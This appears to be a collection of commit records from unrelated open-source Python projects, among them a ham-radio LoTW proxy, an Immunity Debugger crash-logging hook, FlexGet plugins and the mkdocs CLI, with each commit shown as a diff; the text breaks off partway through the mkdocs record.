@@ -0,0 +1,3223 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%22%22%22%0Alotwreport.py: proxy for ARRL LoTW lotwreport.adi web service, which does not%0Asupport CORS headers and thus cannot be called from a script that is loaded%0Afrom any other server. This CGI must be served from the same host name as%0Aany script that wishes to call it. Because I do not want other peoples'%0Ascripts to call this service, it deliberately does nnot support CORS, either.%0A%22%22%22%0A#%0A# LICENSE:%0A#%0A# Copyright (c) 2018, Jeffrey B. Otterson, N1KDO%0A# All rights reserved.%0A#%0A# Redistribution and use in source and binary forms, with or without%0A# modification, are permitted provided that the following conditions are met:%0A#%0A# 1. Redistributions of source code must retain the above copyright notice, this%0A# list of conditions and the following disclaimer.%0A# 2. Redistributions in binary form must reproduce the above copyright notice,%0A# this list of conditions and the following disclaimer in the documentation%0A# and/or other materials provided with the distribution.%0A#%0A# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS %22AS IS%22 AND%0A# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED%0A# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE%0A# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR%0A# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES%0A# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;%0A# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND%0A# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT%0A# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS%0A# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.%0A%0Aimport cgi, os, urllib2, sys%0A%0Avalid_args = %5B'login', 'password', 'qso_query', 'qso_qsl',%0A 'qso_qslsince', 'qso_qsorxsince', 'qso_owncall', 'qso_callsign',%0A 'qso_mode', 'qso_band', 'qso_dxcc',%0A 'qso_startdate', 'qso_starttime',%0A 'qso_enddate', 'qso_endtime',%0A 'qso_mydetail', 'qso_qsldetail', 'qso_withown'%5D%0A%0Aform = cgi.FieldStorage()%0Acallsign = form%5B'login'%5D.value if 'login' in form else None%0Apassword = form%5B'password'%5D.value if 'password' in form else None%0Aclient = os.environ%5B%22REMOTE_ADDR%22%5D%0A%0Apfx = '?'%0Aurl = 'https://lotw.arrl.org/lotwuser/lotwreport.adi'%0Afor arg in valid_args:%0A if arg in form:%0A url = url + pfx + arg + '=' + form%5Barg%5D.value%0A pfx = '&'%0A%0Aif callsign == 'n1kdo' and password is None and client.startswith('192.168.1'):%0A print 'Content-Type: application/x-arrl-adif'%0A print%0A try:%0A filename = callsign + '.adi'%0A with open(filename, 'r') as file:%0A data = file.read()%0A print data%0A except IOError:%0A print 'no cache'%0Aelse:%0A req = urllib2.Request(url)%0A response = urllib2.urlopen(req, None, 600)%0A data = response.read()%0A if callsign == 'n1kdo' and 'ARRL Logbook of the World Status Report' in data:%0A filename = callsign + '.adi'%0A with open(filename, 'w') as file:%0A file.write(data)%0A info = response.info()%0A print 'Content-Type: %25s' %25 info%5B'Content-Type'%5D%0A print%0A print data%0A
e43ffdc6ce35438b188f84ec34855ac3ff5a4722
Create immhook.py
immhook.py
immhook.py
Python
0.000001
@@ -0,0 +1,1040 @@ +#-------------------------------------------------------------------------------%0A# Name: Immunity debugger Exception Hook%0A# Purpose: The script throws out values of EIP,ESP when a crash exception occours%0A#%0A# Author: darklord%0A#%0A# Created: 19/10/2014%0A# Copyright: (c) darklord 2014%0A# Licence: %3Cyour licence%3E%0A#-------------------------------------------------------------------------------%0A%0Aimport immlib%0Afrom immlib import AllExceptHook%0A%0Aclass DemoHook(AllExceptHook):%0A%0A def __init__(self):%0A AllExceptHook.__init__(self)%0A%0A def run(self, regs):%0A imm = immlib.Debugger()%0A #picks up registers from the memory%0A eip = regs%5B'EIP'%5D%0A esp = regs%5B'ESP'%5D%0A #logging register information%0A imm.log(%22EIP: 0x%2508X ESP:0x%2508X%22%25(eip, esp))%0A #reads the data from the ESP%0A buff = imm.readString(esp)%0A%0A%0Adef main(args):%0A imm = immlib.Debugger()%0A newHook = DemoHook()%0A newHook.add('Demo Hook')%0A return 'Hook PyCommand'%0A%0Aif __name__ == '__main__':%0A main()%0A
9fa0ae7c14bfa0d352bedd5ab7ea92be7736a485
Create classes.py
classes.py
classes.py
Python
0.000001
@@ -0,0 +1,593 @@ +#!/usr/bin/env python%0A# -*- coding: utf-8 -*-%0A%0Aimport notelib%0A%0Aclass Student(object):%0A%0A PassedTests = %5B%5D%0A score = 0%0A%0A def __init__(self,name):%0A self.name=name%0A%0A def take_test(self,subject,level):%0A mo = (subject,level)%0A tfiles = %5B%22%7B%7Dquestions.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Danswers.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Dhints.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D),%0A %22%7B%7Dfollowups.txt%7B%7D%22.format(mo%5B0%5D,mo%5B1%5D)%5D%0A counter = 0%0A question = 0%0A qs = open(tfiles%5Bcounter%5D,'r').split()%0A ans = raw_input(qs%5B0%5D)%0A
837e4d87e7f01ea50e9b25e5a8a70149ad521361
Save task only if it differs from TW representation
autoload/vimwiki_pytasks.py
autoload/vimwiki_pytasks.py
import vim import re from tasklib.task import TaskWarrior, Task # Unnamed building blocks UUID_UNNAMED = r'[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' SPACE_UNNAMED = r'\s*' NONEMPTY_SPACE_UNNAMED = r'\s+' FINAL_SEGMENT_SEPARATOR_UNNAMED = r'(\s+|$)' # Building blocks BRACKET_OPENING = re.escape('* [') BRACKET_CLOSING = re.escape('] ') EMPTY_SPACE = r'(?P<space>\s*)' UUID = r'(?P<uuid>{0})'.format(UUID_UNNAMED) TEXT = r'(?P<text>.+(?<!{0}))'.format(UUID_UNNAMED) DUE = r'(?P<due>\(\d{4}-\d\d-\d\d( \d\d:\d\d)?\))' COMPLETION_MARK = r'(?P<completed>.)' UUID_COMMENT = '#{0}'.format(UUID) # Middle building blocks INCOMPLETE_TASK_PREFIX = EMPTY_SPACE + BRACKET_OPENING + '[^X]' + BRACKET_CLOSING + TEXT # Final regexps TASKS_TO_SAVE_TO_TW = ''.join([ INCOMPLETE_TASK_PREFIX, # any amount of whitespace followed by uncompleted square FINAL_SEGMENT_SEPARATOR_UNNAMED, '(', DUE, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # Due is optional '(', UUID_COMMENT, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # UUID is not there for new tasks ]) GENERIC_TASK = re.compile(''.join([ EMPTY_SPACE, BRACKET_OPENING, COMPLETION_MARK, BRACKET_CLOSING, TEXT, FINAL_SEGMENT_SEPARATOR_UNNAMED, '(', DUE, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # Due is optional '(', UUID_COMMENT, FINAL_SEGMENT_SEPARATOR_UNNAMED, ')?' # UUID is not there for new tasks ])) """ How this plugin works: 1.) On startup, it reads all the tasks and syncs info TW -> Vimwiki file. Task is identified by their uuid. 2.) When saving, the opposite sync is performed (Vimwiki -> TW direction). a) if task is marked as subtask by indentation, the dependency is created between """ tw = TaskWarrior() class TaskCache(object): def __init__(self): self.cache = dict() def __getitem__(self, key): task = self.cache.get(key) if task is None: task = VimwikiTask(vim.current.buffer[key], key) self.cache[key] = task return task def __iter__(self): while self.cache.keys(): for key in list(self.cache.keys()): task = self.cache[key] if all([t.line_number not in self.cache.keys() for t in task.add_dependencies]): del self.cache[key] yield task def reset(self): self.cache = dict() cache = TaskCache() class VimwikiTask(object): def __init__(self, line, position): """ Constructs a Vimwiki task from line at given position at the buffer """ match = re.search(GENERIC_TASK, line) self.indent = match.group('space') self.text = match.group('text') self.uuid = match.group('uuid') # can be None for new tasks self.due = match.group('due') # TODO: convert to proper timestamp self.completed_mark = match.group('completed') self.completed = self.completed_mark is 'X' self.line_number = position # We need to track depedency set in a extra attribute, since # this may be a new task, and hence it need not to be saved yet. # We circumvent this problem by iteration order in the TaskCache self.add_dependencies = set() # First set the task attribute to None, then try to load it, if possible self.task = None if self.uuid: try: self.task = tw.tasks.get(uuid=self.uuid) except Task.DoesNotExist: self.task = Task(tw) else: self.task = Task(tw) self.parent = self.find_parent_task() # Make parent task dependant on this task if self.parent: self.parent.add_dependencies |= set([self]) def save_to_tw(self): # Push the values to the Task self.task['description'] = self.text self.task.save() # Load the UUID self.task.refresh() self.uuid = self.task['uuid'] vim.command('echom "uuid: %s"' % self.uuid) # Make parent task dependant on this task if self.parent: self.parent['depends'] = self.task['uuid'] # Mark task as done. This works fine with already completed tasks. if self.completed: self.task.done() def update_from_tw(self): if not self.task: return self.task.refresh() self.text = self.task['description'] # TODO: update due self.completed = (self.task['status'] == u'completed') def __str__(self): self.update_from_tw() return ''.join([ self.indent, '* [', 'X' if self.completed else self.completed_mark, '] ', self.text, ' #', self.uuid or 'TW-NOT_SYNCED' ]) def find_parent_task(self): for i in reversed(range(0, self.line_number)): if re.search(TASKS_TO_SAVE_TO_TW, vim.current.buffer[i]): task = VimwikiTask(line, i) if len(task.indent) < len(self.indent): return task def load_update_incomplete_tasks(): """ Updates all the incomplete tasks in the vimwiki file if the info from TW is different. """ for i in range(len(vim.current.buffer)): line = vim.current.buffer[i] if re.search(TASKS_TO_SAVE_TO_TW, line): task = VimwikiTask(line, i) task.save_to_tw() line = str(task) vim.current.buffer[i] = line number_of_lines = len(vim.current.buffer) vim.command('echom "lines: %d"' % number_of_lines) if __name__ == '__main__': load_update_incomplete_tasks()
Python
0.000031
@@ -3866,24 +3866,132 @@ the Task -%0A + only if the Vimwiki representation%0A # somehow differs%0A # TODO: Check more than description%0A if self.ta @@ -4008,16 +4008,17 @@ ption'%5D +! = self.t @@ -4020,17 +4020,214 @@ elf.text -%0A +:%0A self.task%5B'description'%5D = self.text%0A self.task%5B'depends'%5D %7C= set(s.task for s in self.add_dependencies%0A if not s.task.completed)%0A
466edb19fbf6fcfc51e671a80d45320bd8e1717c
add linode_api
linode_api/View_Network_Transfer.py
linode_api/View_Network_Transfer.py
Python
0.000037
@@ -0,0 +1,958 @@ +#!/usr/bin/env python3%0A# -*- coding: UTF-8 -*-%0A%0Aimport json%0Aimport math%0Aimport sys%0Afrom urllib import parse,request%0A %0A%0ALINODE_ID = ''%0ALINODE_TOKEN_RO = ''%0A %0A%0Adef getTransfer(linode_id, argv):%0A url = 'https://api.linode.com/v4/linode/instances/' + linode_id + '/transfer'%0A header_dict = %7B%0A 'User-Agent': 'User-Agent: curl/7.68.0',%0A 'Authorization': 'Bearer ' + LINODE_TOKEN_RO%7D%0A %0A req = request.Request(url, headers=header_dict)%0A res = request.urlopen(req)%0A ret = res.read()%0A %0A jsonData = json.loads(ret)%0A transfer_quota = float(round(jsonData%5B'quota'%5D, 2))%0A transfer_used = round(jsonData%5B'used'%5D / math.pow(1024, 3), 2)%0A %0A if argv == 'quota':%0A print(transfer_quota)%0A if argv == 'used':%0A print(transfer_used)%0A if argv == 'percent':%0A print(round(float(transfer_used / transfer_quota * 100), 1))%0A %0A%0Adef main():%0A getTransfer(LINODE_ID, sys.argv%5B1%5D)%0A %0A%0Aif __name__ == '__main__':%0A main()%0A
c84e3394ed4829ff9a66167864a11a4ef6a2b62c
Add script to get certificate expiration date
scripts/get_saml_cert_expiration.py
scripts/get_saml_cert_expiration.py
Python
0
@@ -0,0 +1,785 @@ +from cryptography import x509%0Afrom cryptography.hazmat.backends import default_backend%0A%0Afrom bluebottle.clients import properties%0Afrom bluebottle.clients.models import Client%0Afrom bluebottle.clients.utils import LocalTenant%0A%0A%0Adef run(*args):%0A for client in Client.objects.all():%0A with LocalTenant(client):%0A try:%0A cert_string = '-----BEGIN CERTIFICATE-----%5Cn%7B%7D%5Cn-----END CERTIFICATE-----'.format(%0A properties.TOKEN_AUTH%5B'sp'%5D%5B'x509cert'%5D%0A )%0A%0A cert = x509.load_pem_x509_certificate(bytes(cert_string), default_backend())%0A print client.name, cert.not_valid_after%0A except (AttributeError, KeyError):%0A pass%0A except Exception, e:%0A print e%0A
87d3a68e426650ca9cfd0b8d024eaf065d5934b5
Version 0.1.4
background_task/__init__.py
background_task/__init__.py
VERSION = (0, 1, 3) __version__ = '.'.join(map(str, VERSION)) def background(*arg, **kw): from tasks import tasks return tasks.background(*arg, **kw)
Python
0.000001
@@ -14,9 +14,9 @@ 1, -3 +4 )%0A__
3f685e3873c18e1eb28b7a4121c552bbb697e0a4
Add script for generate events.
scripts/generator.py
scripts/generator.py
Python
0
@@ -0,0 +1,1260 @@ +#!/usr/bin/python3%0A%0Afrom random import randint%0A%0Aoutput = %22%22%0Afilename = %22data%22%0A%0A%0Aclass Generator:%0A%0A def gen_date(self):%0A return str(randint(2013, 2015)) + %22-%22 %5C%0A + str(randint(1, 12)) + %22-%22 %5C%0A + str(randint(1, 31))%0A%0A def gen_price(self):%0A return str(10 * randint(10, 100))%0A%0A def gen_author(self):%0A users = %5B%0A %22Intey%22,%0A %22Andrey%22,%0A %22Tatiana%22,%0A %22Nigger%22,%0A %5D%0A return users%5Brandint(1, len(users)-1)%5D%0A%0A def gen_parts(self):%0A return str(randint(0, 15))%0A%0A def gen_row(self, s):%0A return %22:%22.join(%5Bs,%0A self.gen_price(),%0A self.gen_author(),%0A self.gen_date(),%0A self.gen_parts()%5D) + '%5Cn'%0A%0A%0Adef prepare_file(file_name):%0A gena = Generator()%0A with open(file_name, 'r') as f:%0A file_lines = %5B%5D%0A for x in f.readlines():%0A new_line = gena.gen_row(x.rstrip('%5Cn'))%0A # print(new_line)%0A file_lines.append(new_line)%0A%0A # file_lines.sort(key=lambda line: int(line.split(%22:%22)%5B-1%5D))%0A%0A with open(file_name, 'w') as f:%0A f.writelines(file_lines)%0A%0A%0Aif __name__ == %22__main__%22:%0A prepare_file(filename)%0A
8be49481990096c7a4735807cc3d9611b4ce0780
add migration script
scripts/update_metatable_columns.py
scripts/update_metatable_columns.py
Python
0.000001
@@ -0,0 +1,1241 @@ +from plenario.settings import DATABASE_CONN%0Afrom plenario.database import Base%0Afrom plenario.models import MetaTable%0Afrom sqlalchemy import create_engine, Table%0Afrom sqlalchemy.orm import sessionmaker%0Afrom sqlalchemy.exc import NoSuchTableError%0A%0A%0Adef main():%0A%0A # establish connection to provided database%0A engine = create_engine(DATABASE_CONN, convert_unicode=True)%0A session = sessionmaker(bind=engine)()%0A%0A # grab the MetaTable records%0A query = session.query(MetaTable)%0A%0A for table in query.all():%0A%0A try:%0A # reflect existing table information into a Table object%0A t = Table(table.dataset_name, Base.metadata, autoload=True, extend_existing=True)%0A print(table)%0A%0A cols = %7B%7D%0A%0A for col in t.columns:%0A c_name = str(col.name)%0A c_type = str(col.type)%0A%0A if c_name not in %7Bu'geom', u'point_date', u'hash'%7D:%0A cols%5Bc_name%5D = c_type%0A%0A # update existing table%0A table.column_names = cols%0A%0A session.commit()%0A%0A except NoSuchTableError:%0A pass%0A%0A print('... done.')%0A%0A%0Aif __name__ == '__main__':%0A%0A print %22Connecting to %7B%7D%22.format(DATABASE_CONN)%0A main()%0A
f5284cc7da9166a43e3cfbd901205f4446295f7a
Add Consumer Product Safety Commission.
inspectors/cpsc.py
inspectors/cpsc.py
Python
0
@@ -0,0 +1,1917 @@ +#!/usr/bin/env python%0A%0Aimport datetime%0Aimport logging%0Aimport os%0Afrom urllib.parse import urljoin%0A%0Afrom bs4 import BeautifulSoup%0Afrom utils import utils, inspector%0A%0A# https://www.cpsc.gov/en/about-cpsc/inspector-general/%0A# Oldest report: 2003%0A%0A# options:%0A# standard since/year options for a year range to fetch from.%0A#%0A# Notes for IG's web team:%0A# - Fix the links for BLACKLIST_REPORT_URLS%0A%0AREPORTS_URL = %22https://www.cpsc.gov/en/about-cpsc/inspector-general/%22%0A%0ABLACKLIST_REPORT_URLS = %5B%0A 'https://www.cpsc.gov/Media/Documents/About/OIG/Audits/CPSC-Fiscal-Year-2009-Financial-Statements-released-November-13-2009/',%0A%5D%0A%0Adef run(options):%0A year_range = inspector.year_range(options)%0A%0A doc = BeautifulSoup(utils.download(REPORTS_URL))%0A results = doc.select(%22ul.summary-list li%22)%0A for result in results:%0A report = report_from(result, year_range)%0A if report:%0A inspector.save_report(report)%0A%0Adef report_from(result, year_range):%0A link = result.find(%22a%22)%0A report_url = urljoin(REPORTS_URL, link.get('href'))%0A if report_url in BLACKLIST_REPORT_URLS:%0A return%0A report_filename = report_url.split(%22/%22)%5B-1%5D%0A report_id, _ = os.path.splitext(report_filename)%0A if not report_id:%0A import pdb;pdb.set_trace()%0A%0A title = link.text%0A published_on_text = result.select(%22span.date%22)%5B0%5D.text%0A published_on = datetime.datetime.strptime(published_on_text, '%25B %25d, %25Y')%0A%0A if published_on.year not in year_range:%0A logging.debug(%22%5B%25s%5D Skipping, not in requested range.%22 %25 report_url)%0A return%0A%0A report = %7B%0A 'inspector': 'cpsc',%0A 'inspector_url': 'https://www.cpsc.gov/en/about-cpsc/inspector-general/',%0A 'agency': 'cpsc',%0A 'agency_name': 'Consumer Product Safety Commission',%0A 'report_id': report_id,%0A 'url': report_url,%0A 'title': title,%0A 'published_on': datetime.datetime.strftime(published_on, %22%25Y-%25m-%25d%22),%0A %7D%0A return report%0A%0Autils.run(run) if (__name__ == %22__main__%22) else None%0A
79a81b2d1936cd44caabf5f4e38abdee88a8821a
add missing proxy for kiva.agg.plat_support
enthought/kiva/agg/plat_support.py
enthought/kiva/agg/plat_support.py
Python
0
@@ -0,0 +1,51 @@ +# proxy module%0Afrom kiva.agg.plat_support import *%0A
f25a1484892d7b60fb9ffaba033cfb467e1b34f5
Update random-point-in-non-overlapping-rectangles.py
Python/random-point-in-non-overlapping-rectangles.py
Python/random-point-in-non-overlapping-rectangles.py
# Time: O(logn) # Space: O(n) # Given a list of non-overlapping axis-aligned rectangles rects, # write a function pick which randomly and uniformily picks # an integer point in the space covered by the rectangles. # # Note: # - An integer point is a point that has integer coordinates. # - A point on the perimeter of a rectangle is included in the space covered by the rectangles. # - ith rectangle = rects[i] = [x1,y1,x2,y2], # where [x1, y1] are the integer coordinates of the bottom-left corner, # and [x2, y2] are the integer coordinates of the top-right corner. # - length and width of each rectangle does not exceed 2000. # - 1 <= rects.length <= 100 # - pick return a point as an array of integer coordinates [p_x, p_y] # - pick is called at most 10000 times. # # Example 1: # # Input: # ["Solution","pick","pick","pick"] # [[[[1,1,5,5]]],[],[],[]] # Output: # [null,[4,1],[4,1],[3,3]] # Example 2: # # Input: # ["Solution","pick","pick","pick","pick","pick"] # [[[[-2,-2,-1,-1],[1,0,3,0]]],[],[],[],[],[]] # Output: # [null,[-1,-2],[2,0],[-2,-1],[3,0],[-2,-2]] # Explanation of Input Syntax: # # The input is two lists: the subroutines called and their arguments. # Solution's constructor has one argument, # the array of rectangles rects. pick has no arguments. # Arguments are always wrapped with a list, even if there aren't any. import random import bisect class Solution(object): def __init__(self, rects): """ :type rects: List[List[int]] """ self.__rects = list(rects) self.__prefix_sum = map(lambda x : (x[2]-x[0]+1)*(x[3]-x[1]+1), rects) for i in xrange(1, len(self.__prefix_sum)): self.__prefix_sum[i] += self.__prefix_sum[i-1] def pick(self): """ :rtype: List[int] """ target = random.randint(0, self.__prefix_sum[-1]-1) left = bisect.bisect_right(self.__prefix_sum, target) rect = self.__rects[left] width = rect[2]-rect[0]+1 height = rect[3]-rect[1]+1 base = self.__prefix_sum[left]-width*height return [rect[0]+(target-base)%width, rect[1]+(target-base)//width] # Your Solution object will be instantiated and called as such: # obj = Solution(rects) # param_1 = obj.pick()
Python
0.000007
@@ -1,16 +1,42 @@ # Time: + ctor: O(n)%0A# pick: O(logn)
eb8eabd44764dc26fdbd08ef35b3ea8fc0dd7c54
Add mutt display script
bin/mutt-display.py
bin/mutt-display.py
Python
0
@@ -0,0 +1,862 @@ +#!/usr/bin/env python2%0A%22%22%22%0A Copyright 2011 by Brian C. Lane%0A%22%22%22%0Aimport sys%0Aimport email%0A%0Araw_msg = sys.stdin.read()%0Amsg = email.message_from_string(raw_msg)%0Adate = msg.get('Date', None)%0Aif date:%0A from email.utils import mktime_tz, parsedate_tz, formatdate%0A%0A try:%0A # Convert to local TZ%0A tz_tuple = parsedate_tz(date)%0A epoch_time = mktime_tz(tz_tuple)%0A msg.add_header('X-Date', formatdate( epoch_time, localtime=True ))%0A%0A from cStringIO import StringIO%0A from email.generator import Generator%0A fp = StringIO()%0A g = Generator(fp, mangle_from_=False, maxheaderlen=200)%0A g.flatten(msg)%0A sys.stdout.write(fp.getvalue())%0A except:%0A import traceback%0A print(traceback.format_exc())%0A sys.stdout.write(raw_msg)%0Aelse:%0A # just write it out%0A sys.stdout.write(raw_msg)%0A
7e8584f9ed3285f16954bc515ecd154c41c5cf08
Update --movie-queue clear to work with last change.
flexget/plugins/cli/movie_queue.py
flexget/plugins/cli/movie_queue.py
import logging from optparse import OptionValueError from sqlalchemy.exc import OperationalError from flexget.utils import qualities from flexget.utils.tools import console, str_to_boolean from flexget.plugin import DependencyError, register_plugin, register_parser_option try: from flexget.plugins.filter.movie_queue import QueueError, queue_add, queue_del, queue_get, parse_what except ImportError: raise DependencyError(issued_by='cli_movie_queue', missing='movie_queue') log = logging.getLogger('cli_movie_queue') USAGE = '(add|del|list|downloaded) [NAME|IMDB_ID|tmdb_id=TMDB_ID] [QUALITY] [FORCE]' class MovieQueueManager(object): """ Handle IMDb queue management; add, delete and list """ @staticmethod def optik_movie_queue(option, opt, value, parser): """Callback for Optik, parses --movie-queue options and populates movie_queue options value""" options = {} usage_error = OptionValueError('Usage: ' + USAGE) if not parser.rargs: raise usage_error options['action'] = parser.rargs[0].lower() if options['action'] not in ('add', 'del', 'list', 'downloaded', 'clear'): raise usage_error if len(parser.rargs) == 1: if options['action'] not in ('list', 'downloaded', 'clear'): raise usage_error # 2, args is the minimum allowed (operation + item) for actions other than list if len(parser.rargs) >= 2: options['what'] = parser.rargs[1] # 3, quality if len(parser.rargs) >= 3: options['quality'] = parser.rargs[2] else: options['quality'] = 'ANY' # TODO: Get default from config somehow? # why not use the quality user has queued most, ie option called 'auto' ? # and if none is queued default to something good like '720p bluray' # 4, force download if len(parser.rargs) >= 4: options['force'] = str_to_boolean(parser.rargs[3]) else: options['force'] = True parser.values.movie_queue = options def on_process_start(self, feed): """Handle --movie-queue management""" if not getattr(feed.manager.options, 'movie_queue', False): return feed.manager.disable_feeds() options = feed.manager.options.movie_queue if options['action'] == 'list': self.queue_list(feed.session) return if options['action'] == 'downloaded': self.queue_list(feed.session, downloaded=True) return if options['action'] == 'clear': self.clear(feed.session) return if options['action'] == 'del': try: title = queue_del(options['what']) except QueueError, e: console(e.message) else: console('Removed %s from queue' % title) return # Adding to queue requires a lookup for missing information try: what = parse_what(options['what']) options.update(what) except QueueError, e: console(e.message) if not options.get('title') or not (options.get('imdb_id') or options.get('tmdb_id')): console('could not determine movie') # TODO: Rethink errors return try: if options['action'] == 'add': try: added = queue_add(title=options['title'], imdb_id=options['imdb_id'], tmdb_id=options['tmdb_id'], quality=options['quality'], force=options['force']) # warn about a bit silly quality value if qualities.common_name(options['quality']) == '720p': console('WARNING: quality 720p in movie context will not retrieve BluRay rips. You might want to use "720p bluray" instead!') except QueueError, e: console(e.message) if e.errno == 1: # This is an invalid quality error, display some more info console('Recognized qualities are %s' % ', '.join([qual.name for qual in qualities.all()])) console('ANY is the default and can also be used explicitly to specify that quality should be ignored.') else: console('Added %s to queue with quality %s' % (added['title'], added['quality'])) except OperationalError: log.critical('OperationalError') def queue_list(self, session, downloaded=False): """List IMDb queue""" items = queue_get(session=session, downloaded=downloaded) console('-' * 79) console('%-10s %-7s %-37s %-15s %s' % ('IMDB id', 'TMDB id', 'Title', 'Quality', 'Force')) console('-' * 79) for item in items: console('%-10s %-7s %-37s %-15s %s' % (item.imdb_id, item.tmdb_id, item.title, item.quality, item.immortal)) if not items: console('No results') console('-' * 79) def clear(self, session): """Delete movie queue""" items = queue_get(session=session, downloaded=False) console('Removing the following movies from movie queue:') console('-' * 79) for item in items: console(item.title) queue_del(imdb_id=item.imdb_id) if not items: console('No results') console('-' * 79) register_plugin(MovieQueueManager, 'movie_queue_manager', builtin=True) register_parser_option('--movie-queue', action='callback', callback=MovieQueueManager.optik_movie_queue, help=USAGE)
Python
0.000012
@@ -569,16 +569,22 @@ wnloaded +%7Cclear ) %5BNAME%7C @@ -5560,24 +5560,16 @@ eue_del( -imdb_id= item.imd
2957a0331654a22c6f62544b6ec1ca4a4ee86be9
Tweak metainfo_series series name detection.
flexget/plugins/metainfo_series.py
flexget/plugins/metainfo_series.py
import logging from flexget.plugin import * from flexget.utils.titles import SeriesParser import re log = logging.getLogger('metanfo_series') class MetainfoSeries(object): """ Check if entry appears to be a series, and populate series info if so. """ def validator(self): from flexget import validator return validator.factory('boolean') def on_feed_metainfo(self, feed): # Don't run if we are disabled if not feed.config.get('metainfo_series', True): return for entry in feed.entries: match = self.guess_series(entry['title']) if match: entry['series_name'] = match[0] entry['series_season'] = match[1] entry['series_episode'] = match[2] entry['series_parser'] = match[3] entry['series_guessed'] = True def guess_series(self, title): """Returns tuple of (series_name, season, episode, parser) if found, else None""" # Clean the data for parsing parser = SeriesParser() data = parser.clean(title) data = parser.remove_dirt(data) data = ' '.join(data.split()) match = parser.parse_episode(data) if match: if match[0] is None: return elif match[2].start() > 1: # If an episode id is found, assume everything before it is series name name = data[:match[2].start()].rstrip() # Grab the name from the original title to preserve formatting name = title[:len(name)] # Replace . and _ with spaces name = re.sub('[\._]', ' ', name) season = match[0] episode = match[1] parser.name = name parser.data = title parser.season = season parser.episode = episode parser.valid = True return (name, season, episode, parser) register_plugin(MetainfoSeries, 'metainfo_series', builtin=True)
Python
0.000012
@@ -1165,46 +1165,8 @@ ta)%0A - data = ' '.join(data.split())%0A @@ -1686,16 +1686,62 @@ , name)%0A + name = ' '.join(name.split())%0A
622405bd6a9b9d175fbd8a2e93d6cfadb7d7940b
Fix typo.
mkdocs/cli.py
mkdocs/cli.py
#!/usr/bin/env python # coding: utf-8 from __future__ import unicode_literals import logging import click import socket from mkdocs import __version__ from mkdocs import build from mkdocs import gh_deploy from mkdocs import new from mkdocs import serve from mkdocs import utils from mkdocs import exceptions from mkdocs.config import load_config log = logging.getLogger(__name__) class State(object): ''' Maintain logging level.''' def __init__(self, log_name='mkdocs', level=logging.INFO): self.logger = logging.getLogger(log_name) self.logger.propagate = False stream = logging.StreamHandler() formatter = logging.Formatter("%(levelname)-7s - %(message)s ") stream.setFormatter(formatter) self.logger.addHandler(stream) self.logger.setLevel(level) pass_state = click.make_pass_decorator(State, ensure=True) def verbose_option(f): def callback(ctx, param, value): state = ctx.ensure_object(State) if value: state.logger.setLevel(logging.DEBUG) return click.option('-v', '--verbose', is_flag=True, expose_value=False, help='Enable verbose output', callback=callback)(f) def quiet_option(f): def callback(ctx, param, value): state = ctx.ensure_object(State) if value: state.logger.setLevel(logging.ERROR) return click.option('-q', '--quiet', is_flag=True, expose_value=False, help='Silence warnings', callback=callback)(f) def common_options(f): f = verbose_option(f) f = quiet_option(f) return f clean_help = "Remove old files from the site_dir before building" config_file_help = "Provide a specific MkDocs config" dev_addr_help = ("IP address and port to serve documentation locally (default: " "localhost:8000)") strict_help = ("Enable strict mode. This will cause MkDocs to abort the build " "on any warnings.") theme_help = "The theme to use when building your documentation." theme_choices = utils.get_theme_names() site_dir_help = "The directory to output the result of the documentation build." reload_help = "Enable and disable the live reloading in the development server." commit_message_help = ("A commit message to use when commiting to the " "Github Pages remote branch") remote_branch_help = ("The remote branch to commit to for Github Pages. This " "overrides the value specified in config") @click.group(context_settings={'help_option_names': ['-h', '--help']}) @click.version_option(__version__, '-V', '--version') @common_options def cli(): """ MkDocs - Project documentation with Markdown. """ @cli.command(name="serve") @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-a', '--dev-addr', help=dev_addr_help, metavar='<IP:PORT>') @click.option('-s', '--strict', is_flag=True, help=strict_help) @click.option('-t', '--theme', type=click.Choice(theme_choices), help=theme_help) @click.option('--livereload/--no-livereload', default=True, help=reload_help) @common_options def serve_command(dev_addr, config_file, strict, theme, livereload): """Run the builtin development server""" logging.getLogger('tornado').setLevel(logging.WARNING) try: serve.serve( config_file=config_file, dev_addr=dev_addr, strict=strict, theme=theme, livereload=livereload, ) except (exceptions.ConfigurationError, socket.error) as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="build") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-s', '--strict', is_flag=True, help=strict_help) @click.option('-t', '--theme', type=click.Choice(theme_choices), help=theme_help) @click.option('-d', '--site-dir', type=click.Path(), help=site_dir_help) @common_options def build_command(clean, config_file, strict, theme, site_dir): """Build the MkDocs documentation""" try: build.build(load_config( config_file=config_file, strict=strict, theme=theme, site_dir=site_dir ), clean_site_dir=clean) except exceptions.ConfigurationError as e: # Avoid ugly, unhelpful traceback raise SystemExit('\n' + str(e)) @cli.command(name="json") @click.option('-c', '--clean', is_flag=True, help=clean_help) @click.option('-f', '--config-file', type=click.File('rb'), help=config_file_help) @click.option('-s', 